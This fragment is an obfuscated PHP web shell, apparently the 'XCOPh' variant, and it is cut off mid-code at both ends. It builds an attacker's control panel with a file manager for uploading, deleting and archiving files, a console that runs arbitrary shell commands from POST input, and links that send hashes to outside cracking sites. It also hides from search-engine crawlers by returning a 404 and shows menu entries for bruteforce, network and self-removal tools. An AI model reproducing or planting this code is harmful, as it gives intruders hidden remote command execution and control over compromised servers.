onclick=\"document.hf.action='http://md5.rednoize.com/?q='
+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>\r\n <input type='button'
value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php'
;document.hf.submit()\"><br>\r\n\t\t
</form>
</div>"; goto e2a28; d35ed: if (!function_exists('binhex')) { function binhex($p) { return dechex(bindec($p)); } } goto
f4886; da79a: if (@$_POST['p3']) { XCOPhRecursiveGlob($_POST['c']); } goto a857e; Ab0dd: if
(!function_exists('hex2bin')) { function hex2bin($p) { return decbin(hexdec($p)); } } goto d35ed; e2a28: XCOPhFooter();
goto B7d04; Ec7f9: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { XCOPhsetcookie(md5($_SERVER['HTTP_HOST']) .
'ajax', 0); } goto Db5ad; F7330: function XCOPhRecursiveGlob($path) { goto Dc8c2; c5503: if (is_array($paths) &&
@count($paths)) { foreach ($paths as $item) { if (@is_dir($item)) { if ($path != $item) { XCOPhRecursiveGlob($item); } }
else { if (empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2']) !== false) { echo "<a href='#'
onclick='g(\"FilesTools\",null,\"" . urlencode($item) . "\", \"view\",\"\")'>" . htmlspecialchars($item) .
"</a><br>"; } } A3c24: } d4c08: } goto Ca2e7; Bbbbc: $paths = @array_unique(@array_merge(@glob($path .
$_POST['p3']), @glob($path . '*', GLOB_ONLYDIR))); goto c5503; Dc8c2: if (substr($path, -1) != '/') { $path .= '/'; }
goto Bbbbc; Ca2e7: } goto da79a; B7d04: } goto Dc592; B7a38: function actionFilesMan() { goto F92fb; C7101: foreach
($files as $f) { goto e24a2; Dd8d3: bf378: goto B4647; a1364: $l = $l ? 0 : 1; goto Dd8d3; e24a2: echo '<tr' . ($l
? ' class=l1' : '' ) . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name'])
. '" class=chkbx></td><td><a href=# onclick="' . ($f['type']=='file' ? 'g(\' FilesTools\',null,\'' .
urlencode($f['name']) . '\' , \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] .
'\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') .
'</a></td>
<td>' . ($f['type'] == 'file' ? XCOPhViewSize($f['size']) : $f['type']) . '</td>
<td>' . $f['modify'] . '</td>
<td>' . $f['owner'] . '/' . $f['group'] . '</td>
<td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td>
<td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#"
onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . ($f['type'] == 'file'
? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#"
onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td>
</tr>'; goto a1364; B4647: } goto b639c; F2c69: if (class_exists('ZipArchive')) { echo "<option value='zip'>Compress
(zip)</option>
<option value='unzip' selected>Uncompress (unzip)</option>"; } goto e9551; C00b8: echo "<tr>
<td colspan=7>\r\n\t<input type=hidden name=a value='FilesMan'>\r\n\t<input type=hidden name=c
value='" . htmlspecialchars($GLOBALS[' cwd']) . "'>\r\n\t<input type=hidden name=charset value='" .
(isset($_POST['charset']) ? $_POST['charset'] : '' )
. "'>\r\n\t<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"
; goto F2c69; e9551: echo "<option value='tar'>Compress (tar.gz)</option>" ; goto c2f30; D70b9: $i=0;
goto d8ddb; Acd57: echo "<input type='submit' value='>>'></td></tr></form></table></div>" ; goto B13bd;
A23f4: $n=count($dirContent); goto D70b9; Bba11: $GLOBALS['sort']=$sort; goto eb610; Edc50: if
($dirContent===false) { goto C3aaa; C3aaa: echo 'Can\' t open this folder!'; goto D47f8; b45b5: return;
goto f0589; D47f8: XCOPhFooter(); goto b45b5; f0589: } goto Fdc3d; bc342: if (!empty($_POST['p1'])) { if
(preg_match('!s_([A-z]+)_(\\d{1})!', $_POST['p1'], $match)) { $sort=array($match[1], (int) $match[2]); }
} goto A9abd; b9a66: echo "</select> " ; goto bf769; b2756: $i++; goto Cbd33; Fe590: if
(!empty($_POST['p1'])) { goto db671; F0a4f: ac92e: goto a49d4; a49d4: c9cf2: goto Fa4d2; db671: switch
($_POST['p1']) { case 'uploadFile' : if (!@move_uploaded_file($_FILES['f']['tmp_name'],
$_FILES['f']['name'])) { echo "Can't upload file!" ; } goto c9cf2; case 'mkdir' : if
(!@mkdir($_POST['p2'])) { echo "Can't create new dir" ; } goto c9cf2; case 'delete' : goto B6c77; Feadb:
if (is_array(@$_POST['f'])) { foreach ($_POST['f'] as $f) { goto ddea8; F18a8: if (is_dir($f)) {
deleteDir($f); } else { @unlink($f); } goto Afb03; Afb03: Cd3eb: goto f3c03; d29e3: $f=urldecode($f);
goto F18a8; ddea8: if ($f=='..' ) { goto Cd3eb; } goto d29e3; f3c03: } bef0b: } goto C28d8; B6c77:
function deleteDir($path) { goto C3761; fce4b: $type=filetype($item); goto f4400; adff4: @rmdir($path);
goto e166e; f4400: if ($type=="dir" ) { deleteDir($item); } else { @unlink($item); } goto b294d; e2df9:
if (basename($item)==".." || basename($item)=="." ) { goto C06e3; } goto fce4b; Eb459: closedir($dh);
goto adff4; f3093: ef706: goto Eb459; C7c44: $dh=opendir($path); goto d98ff; d98ff: C06e3: goto E1a38;
C3761: $path=substr($path, -1)=='/' ? $path : $path . '/' ; goto C7c44; E1a38: if
(!(($item=readdir($dh)) !==false)) { goto ef706; } goto D4d39; D4d39: $item=$path . $item; goto e2df9;
b294d: goto C06e3; goto f3093; e166e: } goto Feadb; C28d8: goto c9cf2; goto c9206; c9206: case 'paste' :
goto f68fa; f68fa: if ($_COOKIE['act']=='copy' ) { goto Cd5e3; Cd5e3: function copy_paste($c, $s, $d) {
if (is_dir($c . $s)) { goto E9804; Cf2bd: $h=@opendir($c . $s); goto C6e67; abe88: if ($f !="." and $f
!=".." ) { copy_paste($c . $s . '/' , $f, $d . $s . '/' ); } goto d6d02; E9804: mkdir($d . $s); goto
Cf2bd; C30cc: dba21: goto C5a33; D133f: if (!(($f=@readdir($h)) !==false)) { goto dba21; } goto abe88;
d6d02: goto Ba17f; goto C30cc; C6e67: Ba17f: goto D133f; C5a33: } elseif (is_file($c . $s)) { @copy($c .
$s, $d . $s); } } goto d63d3; E3a95: ea2c6: goto E685e; d63d3: foreach ($_COOKIE['f'] as $f) {
copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']); A0baa: } goto E3a95; E685e: } elseif
($_COOKIE['act']=='move' ) { goto bdfb4; bdfb4: function move_paste($c, $s, $d) { if (is_dir($c . $s)) {
goto cf925; d745e: if (!(($f=@readdir($h)) !==false)) { goto c39eb; } goto ba048; fdc73: c39eb: goto
bec75; ba048: if ($f !="." and $f !=".." ) { copy_paste($c . $s . '/' , $f, $d . $s . '/' ); } goto
E35f9; E35f9: goto c1a13; goto fdc73; B2317: $h=@opendir($c . $s); goto dec4f; dec4f: c1a13: goto d745e;
cf925: mkdir($d . $s); goto B2317; bec75: } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } }
goto D4c28; E3e76: e98fc: goto c784f; D4c28: foreach ($_COOKIE['f'] as $f) { @rename($_COOKIE['c'] . $f,
$GLOBALS['cwd'] . $f); D499a: } goto E3e76; c784f: } elseif ($_COOKIE['act']=='zip' ) { if
(class_exists('ZipArchive')) { $zip=new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { goto bdcfc;
bdcfc: chdir($_COOKIE['c']); goto Bcfe0; Bcfe0: foreach ($_COOKIE['f'] as $f) { goto c4d27; a8a2f: a7833:
goto d984b; dd876: if (@is_file($_COOKIE['c'] . $f)) { $zip->addFile($_COOKIE['c'] . $f, $f); } elseif
(@is_dir($_COOKIE['c'] . $f)) { goto cf547; B4e0d: foreach ($iterator as $key => $value) {
$zip->addFile(realpath($key), $key); Cd2a9: } goto E4f52; cf547: $iterator = new
RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/', FilesystemIterator::SKIP_DOTS)); goto
B4e0d; E4f52: e45d7: goto F8204; F8204: } goto a8a2f; c4d27: if ($f == '..') { goto a7833; } goto dd876;
d984b: } goto F001c; C54d8: chdir($GLOBALS['cwd']); goto aa299; F001c: A478c: goto C54d8; aa299:
$zip->close(); goto Fadf6; Fadf6: } } } elseif ($_COOKIE['act'] == 'unzip') { if
(class_exists('ZipArchive')) { goto Ad4de; Cba69: foreach ($_COOKIE['f'] as $f) { if
($zip->open($_COOKIE['c'] . $f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } f30e4: } goto f1610;
f1610: cae3d: goto acf74; Ad4de: $zip = new ZipArchive(); goto Cba69; acf74: } } elseif ($_COOKIE['act'] ==
'tar') { goto De7c0; e409c: XCOPhEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ',
$_COOKIE['f'])); goto a9ddc; De7c0: chdir($_COOKIE['c']); goto ca67c; a9ddc: chdir($GLOBALS['cwd']); goto
E5a51; ca67c: $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); goto e409c; E5a51: } goto a428c;
a428c: unset($_COOKIE['f']); goto C76d9; c15bb: goto c9cf2; goto b02bf; C76d9: setcookie('f', '', time() -
3600); goto c15bb; b02bf: default: if (!empty($_POST['p1'])) { goto Bfcd2; d74b3: XCOPhsetcookie('c',
@$_POST['c']); goto a5e95; C3745: XCOPhsetcookie('f', serialize(@$_POST['f'])); goto d74b3; Bfcd2:
XCOPhsetcookie('act', $_POST['p1']); goto C3745; a5e95: } goto c9cf2; } goto F0a4f; Fa4d2: } goto B6cb2;
Fdc3d: global $sort; goto d82ec; d8ddb: E357c: goto ec3d7; f75b7: F52b1: goto Bba11; f6d44: usort($files,
"XCOPhCmp"); goto Fdb4e; c2f30: if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) { echo "<option
value='paste'>Paste / Compress</option>"; } goto b9a66; fcb2c: $dirs = $files = array(); goto A23f4;
d82ec: $sort = array('name', 1); goto bc342; eb610: function XCOPhCmp($a, $b) { if ($GLOBALS['sort'][0] !=
'size') { return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) *
($GLOBALS['sort'][1] ? 1 : -1); } else { return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ?
1 : -1); } } goto f6d44; A85d7: $l=0; goto C7101; Dfba9: if (@is_file($GLOBALS['cwd'] .
$dirContent[$i])) { $files[]=array_merge($tmp, array('type'=> 'file')); } elseif
(@is_link($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array('type' => 'link',
'link' => readlink($tmp['path']))); } elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] =
array_merge($tmp, array('type' => 'dir')); } goto Da65c; faa24: $files = array_merge($dirs, $files);
goto A85d7; F92fb: if (!empty($_COOKIE['f'])) { $_COOKIE['f'] = @unserialize($_COOKIE['f']); } goto
Fe590; B13bd: XCOPhFooter(); goto F9d66; e96e2: echo '<h1>File manager</h1>
<div class=content>
<script>p1_ = p2_ = p3_ = "";</script>'; goto D1b19; Cbd33: goto E357c; goto f75b7; B6cb2: XCOPhHeader();
goto e96e2; ec3d7: if (!($i < $n)) { goto F52b1; } goto d2437; bf769: if (!empty($_COOKIE['act']) &&
@count($_COOKIE['f']) && ($_COOKIE['act']=='zip' || $_COOKIE['act']=='tar' )) {
echo "file name: <input type=text name=p2 value='XCOPh_" . date("Ymd_His") . "." .
($_COOKIE['act']=='zip' ? 'zip' : 'tar.gz' ) . "'> " ; } goto Acd57; E6d31:
$gr=@posix_getgrgid(@filegroup($dirContent[$i])); goto F0500; d2437:
$ow=@posix_getpwuid(@fileowner($dirContent[$i])); goto E6d31; b639c: Bcbb2: goto C00b8; Da65c:
de3f6: goto b2756; A9abd:
echo "<script>\r\n\tfunction sa() { \r\n\t\tfor(i = 0; i < d.files.elements.length; i++) \r\n\t\t\tif(d.files.elements[i].type == 'checkbox') \r\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked; \r\n\t } \r\n</script>\r\n<table width='100%' class='main' cellspacing='0' cellpadding='2'>\r\n<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"
FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\" )'>Name</a></th>
<th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th>
<th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th>
<th>Owner/Group</th>
<th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th>
<th>Actions</th>
</tr>"; goto fcb2c; F0500: $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i],
'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' =>
XCOPhPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner'
=> $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] :
@filegroup($dirContent[$i])); goto Dfba9; D1b19: $dirContent = XCOPhScandir(isset($_POST['c']) ? $_POST['c'] :
$GLOBALS['cwd']); goto Edc50; Fdb4e: usort($dirs, "XCOPhCmp"); goto faa24; F9d66: } goto Cf332; ee229: if
(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) { $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)
$default_use_ajax; } goto F0eb8; cb8a1: function actionConsole() { goto B8795; f0939: if (!empty($_POST['p1'])) {
echo htmlspecialchars("\$ " . $_POST['p1'] . "\n" . XCOPhEx($_POST['p1'])); } goto D4515; b6928: echo "
<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN); \r\nvar cmds = new Array(''); \r\nvar cur = 0; \r\nfunction kp(e) { \r\n\tvar n = (window.Event) ? e.which : e.keyCode; \r\n\tif(n == 38) { \r\n\t\tcur--; \r\n\t\tif(cur >= 0) \r\n\t\t\tdocument.cf.cmd.value = cmds[cur]; \r\n\t\telse\r\n\t\t\tcur++; \r\n\t } else if (n == 40) { \r\n\t\tcur++; \r\n\t\tif(cur < cmds.length) \r\n\t\t\tdocument.cf.cmd.value = cmds[cur]; \r\n\t\telse\r\n\t\t\tcur--; \r\n\t } \r\n } \r\nfunction add(cmd) { \r\n\tcmds.pop(); \r\n\tcmds.push(cmd); \r\n\tcmds.push(''); \r\n\tcur = cmds.length - 1; \r\n } \r\n</script>
"; goto A5fd8; e3b6f: Bb9a9: goto E0bb9; F3db2: XCOPhHeader(); goto b6928; C28c5: if (empty($_POST['ajax']) &&
!empty($_POST['p1'])) { XCOPhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto F3db2; E0bb9: echo
'</select><input type=button
onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}"
value=">>">
<nobr><input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER[' HTTP_HOST']) . 'ajax' ] ? 'checked' : ''
) . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) ||
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out' ] ? 'checked' : '' )
. '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'
; goto f0939; A5fd8: echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'
clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return
false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}
return false;"><select name=alias>'; goto ebaf1; D4515: echo '</textarea>
<table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0
width="100%">
<tr>
<td width="1%">$</td>
<td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td>
</tr>
</table>'; goto daa84; F5a92: if (isset($_POST['ajax'])) { goto E9651; b6bcf: echo strlen($temp), "\n",
$temp; goto a2dda; Ab3dc: if (preg_match("!.*cd\\s+([^;]+)\$!", $_POST['p1'], $match)) { if
(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='" . $GLOBALS['cwd'] . "';"; } } goto C0934;
E9651: XCOPhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto bc11c; f3920: echo
"d.cf.output.scrollTop = d.cf.output.scrollHeight;"; goto e5afa; a04b2: echo "d.cf.cmd.value='';\n"; goto
D5a95; bc11c: ob_start(); goto a04b2; C0934: echo "d.cf.output.value+='" . $temp . "';"; goto f3920; e5afa:
$temp = ob_get_clean(); goto b6bcf; a2dda: exit; goto c1661; D5a95: $temp = @iconv($_POST['charset'],
'UTF-8', addcslashes("\n\$ " . $_POST['p1'] . "\n" . XCOPhEx($_POST['p1']), "\n\r\t\\'\0")); goto Ab3dc;
c1661: } goto C28c5; daa84: echo '</form>
</div>
<script>d.cf.cmd.focus();</script>'; goto Def11; ebaf1: foreach ($GLOBALS['aliases'] as $n => $v) { goto
Fb8f2; Fb8f2: if ($v == '') { echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>'; goto
db56e; } goto cc583; cc583: echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>'; goto
A736d; A736d: db56e: goto c9981; c9981: } goto e3b6f; B8795: if (!empty($_POST['p1']) &&
!empty($_POST['p2'])) { XCOPhsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true); $_POST['p1'] .=
' 2>&1'; } elseif (!empty($_POST['p1'])) { XCOPhsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0);
} goto F5a92; Def11: XCOPhFooter(); goto e4004; e4004: } goto bf030; E8eb6: if ($cwd[strlen($cwd) - 1] !=
'/') { $cwd .= '/'; } goto ee229; bf030: function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '',
time() - 3600); die('bye!'); } goto A9c07; B8cff: if (!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents =
array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if (preg_match('/' . implode('|',
$userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } goto E7176;
C5959: function XCOPhHeader() { goto B2a88; A44c0: foreach ($charsets as $item) { $opt_charsets .= '<option
value="' . $item . '" ' . ($_POST[' charset']==$item ? 'selected' : '' ) . '>' . $item . '</option>' ;
Bd9bf: } goto dcaf5; b5e8a: if (strpos('Linux', $kernel) !==false) { $explink .=urlencode('Linux
Kernel ' . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . ' ' . substr($release, 0, 3)); } goto Df759; fb8dd: f7f35: goto abf5d; bfba9: A6230: goto b1229; B2a88: if (empty($_POST['
charset'])) { $_POST['charset']=$GLOBALS['default_charset']; } goto E6626; f777e: ffc7f: goto ad9ac;
C8c00: foreach ($m as $k=> $v) { $menu .= '<th width="' . (int) (100 / count($m)) . '%">[ <a href="#"
onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>'; a3ec1: } goto E7224;
cf09b: if (!empty($GLOBALS['auth_pass'])) { $m['Logout'] = 'Logout'; } goto Af433; a428e: goto bf5e0;
goto f777e; b0a15: $kernel = @php_uname('s'); goto F8e92; b1229: if (!($i < $n - 1)) { goto f7f35; }
goto a53dc; a53dc: $cwd_links .="<a href='#' onclick='g(\" FilesMan\",\""; goto f631b; abf5d:
$charsets=array('UTF-8', 'Windows-1251' , 'KOI8-R' , 'KOI8-U' , 'cp866' ); goto A6238; A1a51:
$totalSpace=@disk_total_space($GLOBALS['cwd']); goto F6105; f8de1: bf5e0: goto cb9f1; ba93f: a5e84:
goto Ca109; a8bbe: C3ad7: goto bbf29; Ca109: $j++; goto a428e; C13ee:
$freeSpace=@diskfreespace($GLOBALS['cwd']); goto A1a51; cc894: $path=explode("/", $GLOBALS['cwd']);
goto B375c; f631b: $j=0; goto f8de1; cb9f1: if (!($j <=$i)) { goto ffc7f; } goto Deb37; E6626:
global $color; goto De5c8; a6d50:
echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'
. ($GLOBALS['os']=='win' ? '<br>Drives:' : '' ) . '</span></td>' . '<td><nobr>' .
substr(@php_uname(), 0, 120) . '</nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' .
$gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' .
($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=green><b>OFF</b></font>' )
. ' <a href=# onclick="g(\' Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' .
date('Y-m-d H:i:s') . '<br>' . XCOPhViewSize($totalSpace) . ' <span>Free:</span> ' .
XCOPhViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links .
' ' . XCOPhPermsColor($GLOBALS['cwd']) . ' <a href=#
onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' .
$drives . '</td>' . '<td width=1 align=right>
<nobr><select onchange="g(null,null,null,null,null,this.value)">
<optgroup label="Page charset">' . $opt_charsets . '</optgroup>
</select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client
IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr>
</td>
</tr>
</table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%>
<tr>' . $menu . '</tr>
</table>
<div style="margin:5">'; goto aea39; D0ca7: $m = array('Sec. Info' => 'SecInfo', 'Files' =>
'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' =>
'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network'); goto cf09b; A6238:
$opt_charsets = ''; goto A44c0; bbf29: $i++; goto e33db; a6010: $i = 0; goto bfba9; E7224:
De799: goto dcb11; B3fc9: $release = @php_uname('r'); goto b0a15; F8e92: $explink = ''; goto
b5e8a; b3257: $cwd_links = ''; goto cc894; B375c: $n = count($path); goto a6010; Deb37:
$cwd_links .= $path[$j] . '/'; goto ba93f; Cc1b0: $menu = ''; goto C8c00; De5c8: echo "<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=" . $_POST[' charset']
. "'><title>" . $_SERVER['HTTP_HOST']
. "</title>\r\n<style>\r\nbody{background-color:#444;color:#e1e1e1;}\r\nbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\r\ntable.info{ color:#fff;background-color:#222; }\r\nspan,h1,a{ color: {$color} !important; }\r\nspan{ font-weight: bolder; }\r\nh1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\r\ndiv.content{ padding: 5px;margin-left:5px;background-color:#333; }\r\na{ text-decoration:none; }\r\na:hover{ text-decoration:underline; }\r\n.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\r\n.bigarea{ width:100%;height:300px; }\r\ninput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }\r\nform{ margin:0px; }\r\n#toolsTbl{ text-align:center; }\r\n.toolsInp{ width: 300px }\r\n.main th{text-align:left;background-color:#5e5e5e;}\r\n.main tr:hover{background-color:#5e5e5e}\r\n.l1{background-color:#444}\r\n.l2{background-color:#333}\r\npre{font-family:Courier,Monospace;}\r\n</style>\r\n<script>\r\n var c_ = '"
.htmlspecialchars($GLOBALS['cwd']). "';\r\n var a_ = '".
htmlspecialchars(@$_POST['a']). "'\r\n var charset_ = '".
htmlspecialchars(@$_POST['charset']). "';\r\n var p1_ = '".
(strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'],
ENT_QUOTES)). "';\r\n var p2_ = '". (strpos(@$_POST['p2'], "\n") !== false ? '' :
htmlspecialchars($_POST['p2'], ENT_QUOTES)). "';\r\n var p3_ = '".
(strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'],
ENT_QUOTES))
. "';\r\n var d = document;\r\n\tfunction set(a,c,p1,p2,p3,charset) {\r\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\r\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\r\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\r\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\r\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\r\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t\t//if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t}\r\n\tfunction g(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\td.mf.submit();\r\n\t}\r\n\tfunction a(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\tvar params = 'ajax=true';\r\n\t\tfor(i=0;i<d.mf.elements.length;i++)\r\n\t\t\tparams += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\r\n\t\tsr('"
.addslashes($_SERVER['REQUEST_URI'])
. "', params);\r\n\t}\r\n\tfunction sr(url, params) {\r\n\t\tif (window.XMLHttpRequest)\r\n\t\t\treq = new XMLHttpRequest();\r\n\t\telse if (window.ActiveXObject)\r\n\t\t\treq = new ActiveXObject('Microsoft.XMLHTTP');\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n req.open('POST', url, true);\r\n req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\r\n req.send(params);\r\n }\r\n\t}\r\n\tfunction processReqChange() {\r\n\t\tif( (req.readyState == 4) )\r\n\t\t\tif(req.status == 200) {\r\n\t\t\t\tvar reg = new RegExp(\"
(\\\\d +)([\\\\S\\\\s] *) \", 'm' );\r\n\t\t\t\tvar
arr = reg.exec(req.responseText); \r\n\t\t\t\teval(arr[2].substr(0, arr[1])); \r\n\t\t\t
}
else alert('Request error!'); \r\n\t}\r\n</script>\r\n
<head>
<body>
<div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>\r\n<form
method=post name=mf style='display:none;'>\r\n<input type=hidden
name=a>\r\n<input type=hidden name=c>\r\n<input type=hidden
name=p1>\r\n<input type=hidden name=p2>\r\n<input type=hidden
name=p3>\r\n<input type=hidden name=charset>\r\n</form>"; goto C13ee; F6105:
$totalSpace = $totalSpace ? $totalSpace : 1; goto B3fc9; b1015: if ($GLOBALS['os']
== 'win') { foreach (range('c', 'z') as $drive) { if (is_dir($drive . ':\\')) {
$drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive
. ' ]</a> '; } E6b41: } Aeb5c: } goto a6d50; ad9ac: $cwd_links .= "\")'>" .
$path[$i] . "/</a>"; goto a8bbe; e33db: goto A6230; goto fb8dd; dcb11: $drives = "";
goto b1015; Af433: $m['Self remove'] = 'SelfRemove'; goto Cc1b0; Df759: if
(!function_exists('posix_getegid')) { goto A427d; Bdc04: $group = "?"; goto C134e;
A427d: $user = @get_current_user(); goto Ff189; Ff189: $uid = @getmyuid(); goto
ae6c9; ae6c9: $gid = @getmygid(); goto Bdc04; C134e: } else { goto e2288; a7782:
$uid = $uid['uid']; goto ae8e9; Dc93c: $gid = @posix_getgrgid(posix_getegid()); goto
Bacc4; A57e0: $gid = $gid['gid']; goto a7667; e2288: $uid =
@posix_getpwuid(posix_geteuid()); goto Dc93c; Bacc4: $user = $uid['name']; goto
a7782; ae8e9: $group = $gid['name']; goto A57e0; a7667: } goto b3257; dcaf5: aa543:
goto D0ca7; aea39: } goto de990; d8f3d: if (!function_exists("posix_getgrgid") &&
strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false) { function
posix_getgrgid($p) { return false; } } goto D16d3; C6f8b: $auth_pass = ""; goto
Dfd08; de990: function XCOPhFooter() { $is_writable = is_writable($GLOBALS['cwd']) ?
" <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>
"; echo "\r\n</div>\r\n<table class=info id=toolsTbl cellpadding=3 cellspacing=0
width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>\r\n\t
<tr>\r\n\t\t<td>
<form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change
dir:</span><br><input class='toolsInp' type=text name=c
value='" . htmlspecialchars($GLOBALS[' cwd'])
. "'><input type=submit value='>>'></form></td>\r\n\t\t<td><form onsubmit=\"
g('FilesTools',null,this.f.value);return false;\"><span>Read
